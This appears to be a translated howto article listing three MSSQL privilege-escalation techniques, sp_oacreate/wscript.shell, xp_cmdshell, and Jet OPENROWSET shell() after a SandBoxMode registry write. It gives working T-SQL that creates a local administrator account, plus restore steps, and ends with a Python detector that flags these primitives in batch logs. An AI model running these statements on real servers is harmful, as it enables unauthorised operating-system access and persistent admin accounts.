
Summary of SQL Server lifting methods (MSSQL)

2025-03-31 Update From: SLTechnology News&Howtos


Shulou (Shulou.com) 06/01 Report

Privilege escalation using sp_oacreate

Privilege-escalation statements. sp_configure displays or changes the global configuration settings of the current server; it returns 0 on success and 1 on failure.

```sql
-- privilege-escalation statements
EXEC sp_configure 'show advanced options', 1;
-- make the previous configuration change take effect
RECONFIGURE;
EXEC sp_configure 'Ole Automation Procedures', 1;
RECONFIGURE;

DECLARE @shell INT;
-- use sp_oacreate to instantiate the wscript.shell component and store the returned object handle in @shell
EXEC sp_oacreate 'wscript.shell', @shell OUTPUT;
-- use sp_oamethod to call the Run method of the @shell object to add a user.
-- The Run method's return value is not needed, so NULL is passed for the return-value parameter.
EXEC sp_oamethod @shell, 'run', NULL, 'c:\windows\system32\cmd.exe /c net user margin margin /add';
-- call Run again to add the new user to the local administrators group
EXEC sp_oamethod @shell, 'run', NULL, 'c:\windows\system32\cmd.exe /c net localgroup administrators margin /add';

-- restore statements
EXEC sp_configure 'Ole Automation Procedures', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;
```

The statements above are the sp_oacreate privilege-escalation method. It works by creating an OLE object (OLE is short for Object Linking and Embedding; these are the same OLE objects used from VB) and calling the object's Run method to execute system commands. The official documentation for sp_oacreate states clearly that OLE objects can only be used after 'Ole Automation Procedures' has been enabled, that is, EXEC sp_configure 'Ole Automation Procedures', 1; and that EXEC sp_configure 'show advanced options', 1 must be run before that statement. The official explanation of 'show advanced options' is that it controls whether the sp_configure system stored procedure displays advanced options: when it is set to 1, sp_configure can list the advanced options; the default value is 0. Note that, per the same documentation, sp_oacreate requires membership in the sysadmin fixed server role (or an explicit EXECUTE grant) and changing server options requires the ALTER SETTINGS permission, and the spawned process runs under the SQL Server service account; the "escalation" here is therefore a step from database administrator to operating-system command execution, not from a low-privileged login.

Privilege escalation using xp_cmdshell

```sql
-- privilege-escalation statements
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;  -- turn on xp_cmdshell
-- the full form of master..xp_cmdshell is master.dbo.xp_cmdshell
EXEC master..xp_cmdshell 'net user margin margin /add';
EXEC master..xp_cmdshell 'net localgroup administrators margin /add';

-- restore statements
-- turn xp_cmdshell back off as well; resetting 'show advanced options' alone leaves it enabled
EXEC sp_configure 'xp_cmdshell', 0; RECONFIGURE;
EXEC sp_configure 'show advanced options', 0; RECONFIGURE;
```

Privilege escalation using sandbox mode

```sql
-- privilege-escalation statements
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
-- if this option is not enabled, SQL Server prompts you to enable it when xp_regwrite is executed
EXEC sp_configure 'Ad Hoc Distributed Queries', 1; RECONFIGURE;

-- turn off sandbox mode. If running the whole script at once fails, run the two statements above first.
EXEC master..xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Jet\4.0\Engines', 'SandBoxMode', 'REG_DWORD', 0;

-- check that sandbox mode is now off. In testing, whether sandbox mode was on or off did not affect execution of the statements that follow.
EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Jet\4.0\Engines', 'SandBoxMode';

-- execute system commands through the Jet OLE DB provider's shell() function
SELECT * FROM OPENROWSET('microsoft.jet.oledb.4.0', ';database=c:/windows/system32/ias/ias.mdb', 'select shell("net user margin margin /add")');
SELECT * FROM OPENROWSET('microsoft.jet.oledb.4.0', ';database=c:/windows/system32/ias/ias.mdb', 'select shell("net localgroup administrators margin /add")');
```

Meaning of the sandbox-mode SandBoxMode value (the default is 2):

`0`: sandbox mode is disabled for all owners

`1`: enabled only within the allowed range

`2`: required in access mode

`3`: fully enabled

OPENROWSET lets SQL Server access a data source through an OLE DB provider; OLE DB is the driver layer through which applications connect to SQL Server.

```sql
-- restore configuration
-- EXEC master..xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Jet\4.0\Engines', 'SandBoxMode', 'REG_DWORD', 1;
-- EXEC sp_configure 'Ad Hoc Distributed Queries', 0; RECONFIGURE;
-- EXEC sp_configure 'show advanced options', 0; RECONFIGURE;
```
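All three methods above leave the same fingerprints in T-SQL batch text: an sp_configure toggle of 'Ole Automation Procedures', 'xp_cmdshell' or 'Ad Hoc Distributed Queries' to 1, a call to sp_oacreate/sp_oamethod or xp_cmdshell, an xp_regwrite to the Jet SandBoxMode key, or an OPENROWSET through the Jet provider with shell(). The following detector is an added example (not code from the original article) that scans captured batches, such as the statement text from SQL Server Audit or an Extended Events sql_batch_completed session, for those markers; the log line format and the sample batches are constructed for the demonstration.

```python
"""Flag the OS-command-execution primitives covered above in captured T-SQL batch text."""
import re

# (technique label, pattern). Patterns run against a whitespace-collapsed, lower-cased batch.
RULES = [
    ("enable Ole Automation Procedures",
     re.compile(r"sp_configure\s*'ole automation procedures'\s*,\s*1\b")),
    ("enable xp_cmdshell", re.compile(r"sp_configure\s*'xp_cmdshell'\s*,\s*1\b")),
    ("enable Ad Hoc Distributed Queries",
     re.compile(r"sp_configure\s*'ad hoc distributed queries'\s*,\s*1\b")),
    ("OLE automation (sp_oacreate/sp_oamethod)", re.compile(r"\bsp_oa(create|method)\b")),
    ("xp_cmdshell execution", re.compile(r"\bxp_cmdshell\s+'")),
    ("Jet SandBoxMode registry write",
     re.compile(r"\bxp_regwrite\b.*jet\\4\.0\\engines'\s*,\s*'sandboxmode'")),
    ("OPENROWSET Jet shell()",
     re.compile(r"\bopenrowset\s*\(\s*'microsoft\.jet\.oledb\.4\.0'.*\bshell\s*\(")),
]

def normalize(batch: str) -> str:
    # collapse the spacing variations seen in the listings (e.g. "@ shell", "sp_configure'Ad Hoc")
    return re.sub(r"\s+", " ", batch).strip().lower()

def scan_batch(batch: str) -> list:
    """Return the labels of every rule that matches one T-SQL batch."""
    text = normalize(batch)
    return [label for label, pat in RULES if pat.search(text)]

def scan_log(lines) -> list:
    # constructed log format: "<time>\t<login>\t<batch>"; returns (line number, login, hits) per hit
    findings = []
    for n, line in enumerate(lines, 1):
        parts = line.rstrip("\n").split("\t", 2)
        if len(parts) == 3:
            hits = scan_batch(parts[2])
            if hits:
                findings.append((n, parts[1], hits))
    return findings

# Constructed sample batches; the logins and timestamps are made up, not taken from the page.
SAMPLE_LOG = [
    "2025-03-31T10:00:01\tsa\tEXEC sp_configure 'show advanced options', 1; RECONFIGURE;",
    "2025-03-31T10:00:02\tsa\tEXEC sp_configure 'Ole Automation Procedures', 1; RECONFIGURE;",
    "2025-03-31T10:00:03\tsa\tDeclare @ shell int; Exec sp_oacreate 'wscript.shell', @shell output",
    "2025-03-31T10:00:04\tapp_user\tSELECT TOP 10 * FROM dbo.Orders WHERE Status = 'open';",
    "2025-03-31T10:00:05\tsa\tExec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\\Microsoft\\Jet\\4.0\\Engines','SandBoxMode','REG_DWORD',0",
    "2025-03-31T10:00:06\tsa\tEXEC sp_configure 'xp_cmdshell', 0; RECONFIGURE;",
]

if __name__ == "__main__":
    for n, login, hits in scan_log(SAMPLE_LOG):
        print(f"line {n}: login {login}: {', '.join(hits)}")
```

Setting an option back to 0 is deliberately not flagged, so the restore statements from the listings produce no hits; a real deployment would pair this with a periodic check of sys.configurations so that an option left enabled is also caught.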

SQL Server official reference documentation

sp_configure: https://docs.microsoft.com/zh-cn/sql/relational-databases/system-stored-procedures/sp-configure-transact-sql?view=sql-server-2017

sp_oacreate: https://docs.microsoft.com/zh-cn/sql/relational-databases/system-stored-procedures/sp-oacreate-transact-sql?view=sql-server-2017

sp_oamethod: https://docs.microsoft.com/zh-cn/sql/relational-databases/system-stored-procedures/sp-oamethod-transact-sql?view=sql-server-2017

OPENROWSET: https://docs.microsoft.com/zh-cn/sql/t-sql/functions/openrowset-transact-sql?view=sql-server-2017

OLE DB: https://docs.microsoft.com/zh-cn/sql/connect/oledb/ole-db/oledb-driver-for-sql-server-programming?view=sql-server-2017
